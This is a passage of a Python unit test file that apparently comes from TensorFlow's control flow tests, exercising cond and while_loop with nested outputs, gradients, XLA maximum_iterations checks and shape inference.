with self.cached_session():
alive = constant_op.constant(True, name="alive")
count = constant_op.constant(0, name="count")
def body(i):
return control_flow_ops.cond(
alive, lambda: [math_ops.less(i, 3), math_ops.add(count, 1)],
lambda: [alive, count])
for i in range(10):
alive, count = body(i)
self.assertAllEqual(4, self.evaluate(count))
@test_util.run_v1_only("b/120545219")
def testCond_6(self):
with self.cached_session():
v1 = variables.Variable([7])
age = constant_op.constant(3)
pred = math_ops.greater(age, 4)
fn1 = lambda: age
fn2 = lambda: v1
r = control_flow_ops.cond(pred, fn1, fn2)
self.evaluate(variables.global_variables_initializer())
result = self.evaluate(r)
self.assertAllEqual(np.array([7]), result)
def testCond_7(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: [math_ops.add(x, 1), math_ops.add(x, 2)]
fn2 = lambda: [y, y]
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual([11, 12], self.evaluate(r))
def testCondListOutput(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: [math_ops.add(x, y), math_ops.add(x, y)]
fn2 = lambda: [y, y]
r = control_flow_ops.cond(pred, fn1, fn2)
test_result = self.evaluate(r)
self.assertListEqual([210, 210], test_result)
def testTupleOutput(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: (math_ops.add(x, y), math_ops.add(x, y))
fn2 = lambda: (y, y)
r = control_flow_ops.cond(pred, fn1, fn2)
test_result = self.evaluate(r)
self.assertTupleEqual((210, 210), test_result)
def testDictOutput(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: {"a": math_ops.add(x, y), "b": math_ops.add(x, y)}
fn2 = lambda: {"a": y, "b": y}
r = control_flow_ops.cond(pred, fn1, fn2)
test_result = self.evaluate(r)
self.assertDictEqual({"a": 210, "b": 210}, test_result)
@test_util.run_deprecated_v1
def testEmbeddedListOutput(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: [[math_ops.add(x, y), math_ops.add(x, y)]]
fn2 = lambda: [[y, y]]
# Pass strict=True flag as cond_v2 allows for tensors to be
# in nested output structures as singletons
r = control_flow_ops.cond(pred, fn1, fn2, strict=True)
test_result = self.evaluate(r)
self.assertListEqual([[210, 210]], test_result)
def testEmbeddedTupleOutput(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: ((math_ops.add(x, y), math_ops.add(x, y)))
fn2 = lambda: ((y, y))
r = control_flow_ops.cond(pred, fn1, fn2)
test_result = self.evaluate(r)
self.assertTupleEqual(((210, 210)), test_result)
def testEmbeddedDictOutput(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: {"a": {"c": math_ops.add(x, y)},
"b": {"d": math_ops.add(x, y)}}
fn2 = lambda: {"a": {"c": y},
"b": {"d": y}}
r = control_flow_ops.cond(pred, fn1, fn2)
test_result = self.evaluate(r)
self.assertDictEqual({"a": {"c": 210}, "b": {"d": 210}}, test_result)
@test_util.run_v1_only("b/120545219")
def testCheckNestedOutputStruct(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: {"a": math_ops.add(x, y), "b": math_ops.add(x, y)}
fn2 = lambda: {"c": y, "d": y}
v1_msg = "The two structures don't have the same nested structure"
v2_msg = "Outputs of true_fn and false_fn must have the same structure"
with self.assertRaisesRegexp(
ValueError,
v2_msg if control_flow_util.ENABLE_CONTROL_FLOW_V2 else v1_msg):
r = control_flow_ops.cond(pred, fn1, fn2)
self.evaluate(r)
@test_util.run_deprecated_v1
def testCondRef(self):
with self.cached_session():
x = gen_state_ops.variable(
shape=[1],
dtype=dtypes.float32,
name="x",
container="",
shared_name="")
true_fn = lambda: x
false_fn = lambda: constant_op.constant([2.0])
r = control_flow_ops.cond(constant_op.constant(False), true_fn, false_fn)
self.assertAllEqual([2.0], self.evaluate(r))
@test_util.disable_control_flow_v2("b/79881896 (control deps)")
@test_util.run_v1_only("b/120545219")
def testCondWithControl(self):
with self.cached_session():
control_holder = array_ops.placeholder(dtypes.float32, shape=())
a = constant_op.constant(3)
def true_branch():
with ops.control_dependencies([control_holder]):
_ = a + 1
return a + 2
r = control_flow_ops.cond(
constant_op.constant(True), true_branch,
lambda: constant_op.constant(1))
self.assertEqual(5, self.evaluate(r))
@test_util.run_v1_only("b/120545219")
def testUninitializedRefIdentity(self):
with self.cached_session() as sess:
v = gen_state_ops.variable(
shape=[1],
dtype=dtypes.float32,
name="v",
container="",
shared_name="")
inited = state_ops.is_variable_initialized(v)
v_f, v_t = control_flow_ops.ref_switch(v, inited)
# Both v_f and v_t are uninitialized references. However, an actual use
# of the reference in the 'true' branch in the 'tf.identity' op will
# not 'fire' when v is uninitialized, so this is a valid construction.
# This test tests that ref_identity allows uninitialized ref as input
# so that this construction is allowed.
v_f_op = gen_array_ops.ref_identity(v_f)
v_t_op = gen_array_ops.ref_identity(v_t)
with ops.control_dependencies([v_f_op]):
assign_v = state_ops.assign(v, [1.0])
with ops.control_dependencies([v_t_op]):
orig_v = array_ops.identity(v)
merged_op = control_flow_ops.merge([assign_v, orig_v])
self.assertAllEqual([1.0], self.evaluate(merged_op.output))
def testCondSwitchIdentity(self):
# Make sure the recv identity is not removed by optimization.
with session.Session(config=opt_cfg()) as sess:
pred = constant_op.constant(True)
def fn1():
return control_flow_ops.no_op()
def fn2():
return control_flow_ops.Assert(False, ["Wrong branch!!!"])
r = control_flow_ops.cond(pred, fn1, fn2)
self.evaluate(r)
def testCondRecvIdentity(self):
# Make sure the switch identity is not removed by optimization.
with session.Session(config=opt_cfg()) as sess:
with ops.device(test.gpu_device_name()):
pred = constant_op.constant(True)
def fn1():
return control_flow_ops.no_op()
def fn2():
with ops.device("/cpu:0"):
return control_flow_ops.Assert(False, ["Wrong branch!!!"])
r = control_flow_ops.cond(pred, fn1, fn2)
self.evaluate(r)
@test_util.run_v1_only("b/120545219")
def testCondGrad_1(self):
with self.cached_session():
x = constant_op.constant(10.0, name="x")
pred = math_ops.less(1, 2)
fn1 = lambda: array_ops.identity(x)
fn2 = lambda: array_ops.identity(x)
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [x])[0]
self.assertAllEqual(1.0, self.evaluate(grad))
@test_util.run_deprecated_v1
def testCondGrad_2(self):
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
x = constant_op.constant(10.0)
pred = math_ops.less(c, 2)
fn1 = lambda: math_ops.multiply(x, 42.0)
fn2 = lambda: math_ops.multiply(x, 3.0)
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [x])[0]
self.assertAllEqual(42.0, grad.eval(feed_dict={c: 1}))
self.assertAllEqual(3.0, grad.eval(feed_dict={c: 3}))
@test_util.disable_control_flow_v2(
"b/110550782 (gradient w.r.t external variable)")
@test_util.run_deprecated_v1
def testCondGrad_3(self):
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
ox = constant_op.constant(10.0)
pred = math_ops.less(c, 2)
def fn1(x):
m = x * x
return gradients_impl.gradients(m, [ox])[0]
fn2 = lambda: math_ops.multiply(ox, 3.0)
y = math_ops.multiply(7.0, ox)
r = control_flow_ops.cond(pred, lambda: fn1(y), fn2)
self.assertAllEqual(980.0, r.eval(feed_dict={c: 1}))
self.assertAllEqual(30.0, r.eval(feed_dict={c: 3}))
@test_util.run_deprecated_v1
def testCondGradMultiDevice(self):
config = config_pb2.ConfigProto(device_count={"CPU": 2},
allow_soft_placement=True)
with self.cached_session(use_gpu=True, config=config) as sess:
pred = array_ops.placeholder(dtypes.bool, [])
x = array_ops.placeholder(dtypes.float32)
y = array_ops.placeholder(dtypes.float32)
with ops.device("/cpu:0"):
z = control_flow_ops.cond(pred, lambda: x * y * 2.0, lambda: 2.0)
with ops.device("/cpu:1"):
grad = gradients_impl.gradients(z, x)[0]
with ops.device("/cpu:0"):
grad_grad = gradients_impl.gradients(grad, x)[0]
self.assertEqual(sess.run(grad, {pred: True, x: 1.0, y: 2.0}), 4.0)
self.assertEqual(sess.run(grad, {pred: False, x: 1.0, y: 2.0}), 0.0)
# v1 control flow gets None second derivative for some reason.
if not control_flow_util.ENABLE_CONTROL_FLOW_V2:
self.assertIsNone(grad_grad)
return
self.assertEqual(sess.run(grad_grad, {pred: True, x: 1.0, y: 2.0}), 0.0)
self.assertEqual(sess.run(grad_grad, {pred: False, x: 1.0, y: 2.0}), 0.0)
@test_util.run_v1_only("b/120545219")
def testNestedCond_Simple(self):
with self.cached_session():
x = constant_op.constant(0., name="X")
y = control_flow_ops.cond(
constant_op.constant(True), lambda: x,
lambda: control_flow_ops.cond(x < 1., lambda: x, lambda: x))
result = gradients_impl.gradients(y, x)[0]
self.assertEqual(1.0, self.evaluate(result))
z = control_flow_ops.cond(
constant_op.constant(False), lambda: x,
lambda: control_flow_ops.cond(x < 1., lambda: x, lambda: x))
result = gradients_impl.gradients(z, x)[0]
self.assertEqual(1.0, self.evaluate(result))
@test_util.disable_control_flow_v2("b/113327884")
@test_util.run_v1_only("b/120545219")
def testCondGrad_Gather(self):
with self.cached_session() as sess:
v1 = variables.Variable([1.0, 42.0])
c = array_ops.placeholder(dtypes.int32, shape=[])
pred = math_ops.less(c, 2)
fn1 = lambda: array_ops.identity(v1)
fn2 = lambda: array_ops.gather(v1, [1, 1])
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [v1])[0]
self.evaluate(variables.global_variables_initializer())
# Should just be [1, 1], but possibly a sparse representation
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 1})
dense_gv = [
sum(y for (x, y) in zip(gi, gv) if x == i) for i in range(2)
]
self.assertAllEqual(dense_gv, [1.0, 1.0])
# Should be [0, 2], as the else forwards v1[1] twice
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 3})
dense_gv = [
sum(y for (x, y) in zip(gi, gv) if x == i) for i in range(2)
]
self.assertAllEqual(dense_gv, [0.0, 2.0])
@test_util.run_v1_only("b/120545219")
def testCondPredicateTensor(self):
"""Regression test for lowering predicate from non-first output of an op."""
@eager_function.defun
def foo():
return constant_op.constant("foo"), constant_op.constant(True)
r = control_flow_ops.cond(foo()[1], lambda: 1.0, lambda: 2.0)
self.assertEqual(self.evaluate(r), 1.0)
@test_util.run_in_graph_and_eager_modes
def testCondAutoControlDeps(self):
def branch_fn():
logging_ops.print_v2("A")
logging_ops.print_v2("B")
with ops.control_dependencies([logging_ops.print_v2("C")]):
return constant_op.constant(10)
def build_cond():
return control_flow_ops.cond(
constant_op.constant(True), branch_fn, lambda: 0)
def build_nested_cond():
return control_flow_ops.cond(
constant_op.constant(True), build_cond, lambda: 0)
# In v1 graph mode, pruning should make only "C" print.
if not context.executing_eagerly():
with self.cached_session():
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(build_cond()), 10)
self.assertEqual(printed.contents(), "C\n")
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(build_nested_cond()), 10)
self.assertEqual(printed.contents(), "C\n")
# In defuns, all prints should execute in program order.
# This doesn't work with legacy control flow.
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
@eager_function.defun
def cond():
return build_cond()
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(cond()), 10)
self.assertEqual(printed.contents(), "A\nB\nC\n")
@eager_function.defun
def nested_cond():
return build_nested_cond()
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(nested_cond()), 10)
self.assertEqual(printed.contents(), "A\nB\nC\n")
# wrap_function should prune.
def pruned_cond():
return build_cond()
pruned_cond = wrap_function.wrap_function(pruned_cond, [])
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(pruned_cond()), 10)
self.assertEqual(printed.contents(), "C\n")
def pruned_nested_cond():
return build_nested_cond()
pruned_nested_cond = wrap_function.wrap_function(pruned_nested_cond, [])
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(pruned_nested_cond()), 10)
self.assertEqual(printed.contents(), "C\n")
@test_util.run_in_graph_and_eager_modes
def testWhileAutoControlDeps(self):
# Legacy while_loop fails this test because it produces deprecation notices
# in stderr.
if not control_flow_util.ENABLE_CONTROL_FLOW_V2: return
def cond(i, unused_x):
logging_ops.print_v2("A")
return i < 2
def body(i, x):
logging_ops.print_v2("B")
with ops.control_dependencies([logging_ops.print_v2("C")]):
x = array_ops.identity(x)
with ops.control_dependencies([logging_ops.print_v2("D")]):
return i + 1, x
def build_while():
return control_flow_ops.while_loop(
cond, body, [constant_op.constant(0), constant_op.constant(0)])
def build_nested_while():
return control_flow_ops.cond(
constant_op.constant(True), build_while, lambda: [0, 0])
# In v1 graph mode, pruning should make only "D" print.
if not context.executing_eagerly():
with self.cached_session():
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(build_while()[0]), 2)
self.assertEqual(printed.contents(), "D\nD\n")
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(build_nested_while()[0]), 2)
self.assertEqual(printed.contents(), "D\nD\n")
# In defuns, all prints should execute in program order.
@eager_function.defun
def while_loop():
return build_while()[0]
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(while_loop()), 2)
self.assertEqual(printed.contents(), "A\nB\nC\nD\nA\nB\nC\nD\nA\n")
@eager_function.defun
def nested_while_loop():
return build_nested_while()[0]
# TODO(b/117840611): calling nested_while_loop fails in eager
if not context.executing_eagerly():
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(nested_while_loop()), 2)
self.assertEqual(printed.contents(), "A\nB\nC\nD\nA\nB\nC\nD\nA\n")
# wrap_function should prune.
def pruned_while():
return build_while()[0]
pruned_while = wrap_function.wrap_function(pruned_while, [])
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(pruned_while()), 2)
self.assertEqual(printed.contents(), "D\nD\n")
def pruned_nested_while():
return build_nested_while()[0]
pruned_nested_while = wrap_function.wrap_function(pruned_nested_while, [])
# TODO(b/117840611): calling nested_while_loop fails in eager
if not context.executing_eagerly():
with self.captureWritesToStream(sys.stderr) as printed:
self.assertEqual(self.evaluate(pruned_nested_while()), 2)
self.assertEqual(printed.contents(), "D\nD\n")
# Microbenchmark: 256,000 iterations/s.
@test_util.disable_control_flow_v2("b/116630618 (Times out)")
def testWhile_1(self):
with self.cached_session():
n = constant_op.constant(0)
c = lambda x: math_ops.less(x, 10000)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual(10000, self.evaluate(r))
@test_util.disable_control_flow_v2("b/79881896 (control deps)")
@test_util.run_v1_only("b/120545219")
def testWhileExternalControlDependencies(self):
with self.cached_session():
v = variables.Variable(0.0)
v.initializer.run()
increment = v.assign_add(1.0)
def body_fn(i):
with ops.control_dependencies([increment]):
return i + 1
result = control_flow_ops.while_loop(cond=lambda i: i < 2,
body=body_fn, loop_vars=[1])
self.assertAllEqual(result, 2)
self.assertAllEqual(v.read_value(), 1.0)
@test_util.disable_control_flow_v2("b/79881896 (control deps)")
@test_util.run_v1_only("b/120545219")
def testWhileExternalControlDependenciesNoInput(self):
with self.cached_session():
v = variables.Variable(0.0)
v.initializer.run()
increment = v.assign_add(1.0)
def body_fn(unused_i):
with ops.control_dependencies([increment]):
return constant_op.constant(5, name="five")
result = control_flow_ops.while_loop(cond=lambda i: i < 5,
body=body_fn, loop_vars=[0])
self.evaluate(result)
self.assertAllEqual(self.evaluate(v), 1.0)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileWithRefs_1(self):
with self.cached_session() as sess:
x = variables.VariableV1(0)._ref() # pylint: disable=protected-access
i = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 100)
self.assertEqual(x.dtype, dtypes.int32_ref)
def b(i, x):
self.assertEqual(x.dtype, dtypes.int32_ref)
return (i + 1, gen_array_ops.ref_identity(x))
r = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=5)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(r[0].dtype, dtypes.int32)
self.assertEqual(r[1].dtype, dtypes.int32_ref)
value_i, value_x = self.evaluate(r)
self.assertEqual(100, value_i)
self.assertEqual(0, value_x)
def testWhile_2(self):
with self.cached_session():
s = constant_op.constant(0)
r = isum(s)
self.assertAllEqual(45, self.evaluate(r))
def testWhileWithMaximumIterations(self):
with self.cached_session():
s = constant_op.constant([1, 2, 3, 4, 5])
r = isum(s, maximum_iterations=3)
self.assertAllEqual([1 + 3, 2 + 3, 3 + 3, 4 + 3, 5 + 3], self.evaluate(r))
@test_util.run_v1_only("b/120545219")
def testWhileWithMaximumIterationsAndSingleArgument(self):
with self.cached_session():
r = control_flow_ops.while_loop(
lambda i: i < 3, lambda i: i + 1, [0], maximum_iterations=1)
self.assertEqual(1, self.evaluate(r))
@test_util.disable_control_flow_v2("b/115776323 (max_iters)")
@test_util.run_v1_only("b/120545219")
def testSingleNestedMaximumIterationsWhileLoopGradientInXLAContext(self):
v = constant_op.constant(1.0)
def training_loop_with_gradient(i):
out = control_flow_ops.while_loop(
lambda i_, _: i_ < 3,
lambda i_, j: [i_ + 1, j * v], [0, 1.0],
maximum_iterations=i)
g = gradients_impl.gradients(out, v)
with ops.control_dependencies(g):
return i + 1
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
# Create training loop, ensure we can call gradient() of
# while_loop inside the training loop.
loop = control_flow_ops.while_loop(lambda i: i < 3,
training_loop_with_gradient, [0])
xla_context.Exit()
loop_execute = array_ops.identity(loop) # Because loop is not fetchable.
# Should execute without issue.
self.assertEqual(3, self.evaluate(loop_execute))
@test_util.run_v1_only("b/120545219")
def testInvalidMaximumIterationsWhileLoopGradientInXLAContext(self):
v = constant_op.constant(1.0)
def inner_body(i, x):
out = control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, j: [i + 1, j * v], [0, x],
maximum_iterations=i)
return out
def create_while_loop(maximum_iterations=None):
return control_flow_ops.while_loop(
lambda i, _: i < 3,
inner_body, [0, 1.0],
maximum_iterations=maximum_iterations)
loop_no_xla = create_while_loop(maximum_iterations=5)
# maximum_iterations is fine outside of an XLA scope
gs = gradients_impl.gradients(loop_no_xla, v)
self.evaluate(gs) # This should execute without error.
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
with self.assertRaisesRegexp(
ValueError,
r"maximum_iterations is None. It is required and must be statically "
r"known \(e.g. a constant value or known shape dimension\) when "
r"building while_loop in XLA context."):
loop_no_maxiter = create_while_loop()
with self.assertRaisesRegexp(
ValueError,
r"maximum_iterations must be statically "
r"known \(e.g. a constant value or known shape dimension\) when "
r"building while_loop in XLA context."):
loop_with_maxiter = create_while_loop(maximum_iterations=2)
xla_context.Exit()
else:
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
loop_no_maxiter = create_while_loop()
loop_with_maxiter = create_while_loop(maximum_iterations=2)
xla_context.Exit()
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside "
r"XLA while_loop because maximum_iterations was not passed to "
r"the tf.while_loop call \('.+'\)."):
_ = gradients_impl.gradients(loop_no_maxiter, v)
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside XLA "
r"while_loop. maximum_iterations tensor '.+' for while_loop context "
r"'.+' must be statically known \(e.g. a constant value or known "
r"shape dimension\), or be defined at or outside the while loop "
r"context '.*' \(currently defined in '.*'\)"):
_ = gradients_impl.gradients(loop_with_maxiter, v)
@test_util.run_v1_only("b/120545219")
def testInvalidMaximumIterationsFromSiblingContextWhileLoopInXLAContext(self):
v = constant_op.constant(1.0)
def create_while_loop():
max_iter_holder = []
def create_mi():
max_iter_holder.append(array_ops.placeholder(dtypes.int32, shape=()))
return 1.0
_ = control_flow_ops.cond(
constant_op.constant(True), create_mi, create_mi)
return control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, x: (i + 1, v * x), (0, 1.0),
maximum_iterations=max_iter_holder[0])
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
with self.assertRaisesRegexp(
ValueError,
r"maximum_iterations must be statically known \(e.g. a constant value"
r" or known shape dimension\) when building while_loop in XLA "
r"context."):
loop = create_while_loop()
xla_context.Exit()
else:
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
loop = create_while_loop()
xla_context.Exit()
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside XLA "
r"while_loop. maximum_iterations tensor '.*Placeholder:0' for "
r"while_loop context '.+' must be statically known \(e.g. a constant "
r"value or known shape dimension\), or be defined at or outside the "
r"while loop context '' \(currently defined in 'cond/.+'\)"):
_ = gradients_impl.gradients(loop, v)
@test_util.disable_control_flow_v2("b/118457764")
@test_util.run_v1_only("b/120545219")
def testNestedWhileLoopWithMaxItersFromOuterContextInXLAContext(self):
v = constant_op.constant(1.0)
p = array_ops.placeholder(dtype=dtypes.int32)
def mid_body_builder(iterations):
def mid_body(i, x):
r = control_flow_ops.while_loop(
lambda *_: True,
lambda i, x: (i + 1, v * x), (0, x),
maximum_iterations=iterations,
name="inner")
return (i + 1, gradients_impl.gradients(x + r[1], v)[0])
return mid_body
def outer_body(i, x):
iterations = array_ops.size(p, name="iterations")
return (i + 1, x + control_flow_ops.while_loop(
lambda *_: True,
mid_body_builder(iterations), (0, x),
maximum_iterations=iterations,
name="mid")[1])
def create_while_loop():
with ops.device("/cpu:0"):
r = control_flow_ops.while_loop(
lambda *_: True,
outer_body, (0, 1.0),
maximum_iterations=5,
name="outer")
return array_ops.identity(r[1])
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
final_with_xla_context = create_while_loop()
xla_context.Exit()
final_without_xla_context = create_while_loop()
with self.session(use_gpu=False) as sess:
opts = config_pb2.RunOptions(trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
final_value_without_xla_context = sess.run(
final_without_xla_context, feed_dict={
p: [0, 0, 0]
})
final_value_with_xla_context = sess.run(
final_with_xla_context,
feed_dict={p: [0, 0, 0]},
options=opts,
run_metadata=run_metadata)
node_stats = run_metadata.step_stats.dev_stats[0].node_stats
stack_push_count = len(
[x for x in node_stats if x.node_name.endswith("StackPushV2")])
      # The number of stack pushes equals the product of the maximum_iterations
      # values; the last two 3s come from size(p) when p == [0, 0, 0].
self.assertEqual(stack_push_count, 5 * 3 * 3)
self.assertAllClose(final_value_with_xla_context,
final_value_without_xla_context)
# Have more than 10 parallel iterations and hence exercise k-bound
# most of the time.
@test_util.run_deprecated_v1
def testWhile_3(self):
with self.cached_session():
def compute(i, m, c, o):
m, c = [math_ops.add(m, 1), math_ops.add(c, 1)]
o = math_ops.add(o, m)
o = math_ops.add(o, c)
i = math_ops.add(i, 1)
return [i, m, c, o]
i = ops.convert_to_tensor(0)
m = ops.convert_to_tensor(0)
c = ops.convert_to_tensor(0)
o = ops.convert_to_tensor(0)
d = ops.convert_to_tensor(100)
r = control_flow_ops.while_loop(lambda i, m, c, o: math_ops.less(i, d),
compute, [i, m, c, o])
result = r[3]
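      # Each iteration k sets m = c = k and adds m + c = 2 * k to o, so after
      # 100 iterations o = 2 * (1 + 2 + ... + 100) = 10100.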
self.assertAllEqual(10100, result)
@test_util.run_deprecated_v1
def testWhile_4(self):
with self.cached_session():
def compute(i, m, c, o):
m, c = [array_ops.gather(x, i), array_ops.gather(x, i)]
o = math_ops.add(o, m)
o = math_ops.add(o, c)
i = math_ops.add(i, 1)
return [i, m, c, o]
i = ops.convert_to_tensor(0)
m = ops.convert_to_tensor(0)
c = ops.convert_to_tensor(0)
o = ops.convert_to_tensor(0)
x = ops.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = array_ops.size(x)
r = control_flow_ops.while_loop(lambda i, m, c, o: math_ops.less(i, s),
compute, [i, m, c, o])
result = r[3]
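      # o accumulates 2 * x[i] per iteration: 2 * (1+2+3+4+5+6) = 42.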
self.assertAllEqual(42, result)
@test_util.run_v1_only("b/120545219")
def testWhile_5(self):
with self.cached_session():
def compute(i, c, o):
c = array_ops.strided_slice(x, array_ops.expand_dims(i, 0),
[1] + array_ops.expand_dims(i, 0))
o = array_ops.concat([o, c], 0)
i = math_ops.add(i, 1)
return [i, c, o]
i = ops.convert_to_tensor(0)
c = ops.convert_to_tensor([0])
o = ops.convert_to_tensor([0])
x = ops.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = array_ops.size(x)
r = control_flow_ops.while_loop(lambda i, c, o: math_ops.less(i, s),
compute, [i, c, o], [
i.get_shape(),
tensor_shape.unknown_shape(),
tensor_shape.unknown_shape()
])
result = r[2]
self.assertAllEqual(np.array([0, 1, 2, 3, 4, 5, 6]), result)
@test_util.disable_control_flow_v2("b/116338794 (buffer_reuse)")
@test_util.run_v1_only("b/120545219")
def testBufferForwarding(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with self.cached_session() as sess:
with ops.device("/cpu:0"):
c = constant_op.constant(2)
i0 = constant_op.constant(0)
r = control_flow_ops.while_loop(lambda i: i < 1000,
lambda i: math_ops.square(c) + i, [i0])
r_val = sess.run(r, options=run_options, run_metadata=run_metadata)
self.assertEqual(1000, r_val)
self.assertTrue(run_metadata.HasField("step_stats"))
unique_allocs = set()
for node_stat in run_metadata.step_stats.dev_stats[0].node_stats:
for output in node_stat.output:
unique_allocs.add(
output.tensor_description.allocation_description.ptr)
# Prior to cl/147536680, the number of unique allocations was about 1005.
self.assertLess(len(unique_allocs), 756)
def _testWhile_Gpu_1(self, use_gpu):
with self.cached_session(use_gpu=use_gpu):
n = constant_op.constant(1.0)
c = lambda x: math_ops.less(x, 10.0)
b = lambda x: math_ops.add(x, 1.0)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllClose(10.0, self.evaluate(r))
def testWhile_Gpu_1(self):
self._testWhile_Gpu_1(use_gpu=False)
self._testWhile_Gpu_1(use_gpu=True)
def _testWhile_Gpu_2(self, use_gpu):
with self.cached_session(use_gpu=use_gpu):
n = constant_op.constant(1.0)
c = lambda x: math_ops.less(x, 10.0)
def b(x):
with ops.device("/cpu:0"):
return math_ops.add(x, 1.0)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllClose(10.0, self.evaluate(r))
def testWhile_Gpu_2(self):
self._testWhile_Gpu_2(use_gpu=False)
self._testWhile_Gpu_2(use_gpu=True)
def testWhileShape(self):
with self.cached_session():
i = constant_op.constant(0)
m = array_ops.ones([2, 2])
c = lambda i, j: math_ops.less(i, 2)
def _b(i, j):
new_i = math_ops.add(i, 1)
new_j = array_ops.tile(j, [2, 2])
return [new_i, new_j]
r = control_flow_ops.while_loop(
c, _b, [i, m],
[i.get_shape(), tensor_shape.unknown_shape()])
r = r[1] * array_ops.ones([8, 8])
self.assertAllEqual(np.ones((8, 8)), self.evaluate(r))
@test_util.run_deprecated_v1
def testWhileWithNonTensorInput_Scalar(self):
with self.cached_session():
n = 0
c = lambda x: x < 10000
b = lambda x: x + 1
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual(10000, self.evaluate(r))
def testWhileWithNonTensorInput_Vector(self):
with self.cached_session():
      n = np.array([0])  # Note: [0] would not work here; it is a plain Python list.
c = lambda x: x[0] < 10000
b = lambda x: array_ops.stack([x[0] + 1])
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual([10000], self.evaluate(r))
@test_util.run_v1_only("b/120545219")
def testWhileShapeInference(self):
with self.cached_session():
i = constant_op.constant(0)
m = array_ops.ones([2, 2])
c = lambda i, j: math_ops.less(i, 2)
def b(i, j):
new_i = math_ops.add(i, 1)
new_j = array_ops.concat([j, j], 0)
return [new_i, new_j]
r = control_flow_ops.while_loop(
c, b, [i, m],
[i.get_shape(), tensor_shape.TensorShape([None, 2])])
self.assertIsNone(r[1].shape.dims[0].value)
self.assertEqual(r[1].shape.dims[1], tensor_shape.Dimension(2))
with self.assertRaisesRegexp(
ValueError,
r"Input tensor 'ones:0' enters the loop with shape \(2, 2\), but has "
r"shape \(4, 2\) after one iteration. To allow the shape to vary "
r"across iterations, use the `shape_invariants` argument of "
r"tf.while_loop to specify a less-specific shape."):
r = control_flow_ops.while_loop(c, b, [i, m])
@test_util.disable_control_flow_v2("b/116328420 (SparseTensor)")
@test_util.run_v1_only("b/120545219")
def testWhileShapeInferenceSparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
i = constant_op.constant(0)
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
sparse_tensor.SparseTensor(x.indices, x.values * 2.0, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
